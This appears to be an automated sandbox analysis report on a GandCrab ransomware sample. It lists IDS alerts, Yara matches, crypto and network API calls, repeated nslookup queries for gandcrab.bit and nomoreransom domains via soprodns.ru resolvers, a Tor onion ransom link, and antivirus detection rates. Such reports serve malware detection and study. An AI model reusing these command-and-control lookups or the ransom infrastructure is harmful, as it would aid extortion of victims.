Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:59115 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:59116 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:59117 -> 8.8.8.8:53

Contains functionality to determine the online IP of the system

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D6E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	0_2_0F1D6E90
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D6E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	0_2_0F1D6E90
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC6E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	9_2_0FBC6E90
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC6E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	9_2_0FBC6E90
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC6E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	25_2_0FBC6E90
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC6E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	25_2_0FBC6E90

Found Tor onion address

Source: O8ZHhytWhn.exe, 00000000.00000000.248593701.000000000F1E2000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
Source: O8ZHhytWhn.exe, 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
Source: wjaoab.exe, 00000009.00000000.289875664.000000000FBD2000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
Source: wjaoab.exe, 00000019.00000000.308682011.000000000FBD2000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
Source: O8ZHhytWhn.exe	String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
Source: wjaoab.exe.0.dr	String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b

Uses nslookup.exe to query domains

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior

May check the online IP address of the machine

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	DNS query: name: ipv4bot.whatismyipaddress.com

Performs many domain queries via nslookup

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior

Source: O8ZHhytWhn.exe, wjaoab.exe.0.dr	String found in binary or memory: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
Source: O8ZHhytWhn.exe, wjaoab.exe.0.dr	String found in binary or memory: https://tox.chat/download.html
Source: O8ZHhytWhn.exe, wjaoab.exe.0.dr	String found in binary or memory: https://www.torproject.org/

Source: unknown

DNS traffic detected: queries for: ipv4bot.whatismyipaddress.com

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe

Code function: 0_2_0F1D7EF0 lstrcatW,InternetCloseHandle,InternetConnectW,VirtualAlloc,wsprintfW,HttpOpenRequestW,HttpAddRequestHeadersW,HttpSendRequestW,InternetReadFile,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,VirtualFree,

0_2_0F1D7EF0

Spam, unwanted Advertisements and Ransom Demands

Yara detected Gandcrab

Source: Yara match	File source: O8ZHhytWhn.exe, type: SAMPLE
Source: Yara match	File source: 9.0.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.O8ZHhytWhn.exe.f1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.O8ZHhytWhn.exe.f1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.248593701.000000000F1E2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.308682011.000000000FBD2000.00000008.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.289875664.000000000FBD2000.00000008.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: O8ZHhytWhn.exe PID: 5900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wjaoab.exe PID: 5444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wjaoab.exe PID: 2888, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, type: DROPPED

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D6530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	0_2_0F1D6530
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC6530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	9_2_0FBC6530
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC6530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	25_2_0FBC6530

Source: nslookup.exe

Process created: 48

System Summary

Malicious sample detected (through community Yara rule)

Source: O8ZHhytWhn.exe, type: SAMPLE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: O8ZHhytWhn.exe, type: SAMPLE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 9.0.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 9.0.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 25.2.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 25.2.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 25.0.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 25.0.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.2.O8ZHhytWhn.exe.f1d0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.O8ZHhytWhn.exe.f1d0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.O8ZHhytWhn.exe.f1d0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.O8ZHhytWhn.exe.f1d0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 9.2.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 9.2.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, type: DROPPED	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, type: DROPPED	Matched rule: Gandcrab Payload Author: kevoreilly

Source: O8ZHhytWhn.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: O8ZHhytWhn.exe, type: SAMPLE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: O8ZHhytWhn.exe, type: SAMPLE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: O8ZHhytWhn.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: O8ZHhytWhn.exe, type: SAMPLE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 9.0.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 9.0.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 9.0.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 9.0.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 25.2.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 25.2.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 25.2.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 25.2.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 25.0.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 25.0.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 25.0.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 25.0.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.O8ZHhytWhn.exe.f1d0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.O8ZHhytWhn.exe.f1d0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.2.O8ZHhytWhn.exe.f1d0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.2.O8ZHhytWhn.exe.f1d0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.2.O8ZHhytWhn.exe.f1d0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.O8ZHhytWhn.exe.f1d0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.O8ZHhytWhn.exe.f1d0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.O8ZHhytWhn.exe.f1d0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 9.2.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 9.2.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 9.2.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 9.2.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, type: DROPPED	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, type: DROPPED	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, type: DROPPED	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D1C20	0_2_0F1D1C20
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D1020	0_2_0F1D1020
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D83C0	0_2_0F1D83C0
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC83C0	9_2_0FBC83C0
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC1C20	9_2_0FBC1C20
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC1020	9_2_0FBC1020
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC83C0	25_2_0FBC83C0
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC1C20	25_2_0FBC1C20
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC1020	25_2_0FBC1020

Source: O8ZHhytWhn.exe	Virustotal: Detection: 87%
Source: O8ZHhytWhn.exe	Metadefender: Detection: 78%
Source: O8ZHhytWhn.exe	ReversingLabs: Detection: 92%

Source: O8ZHhytWhn.exe

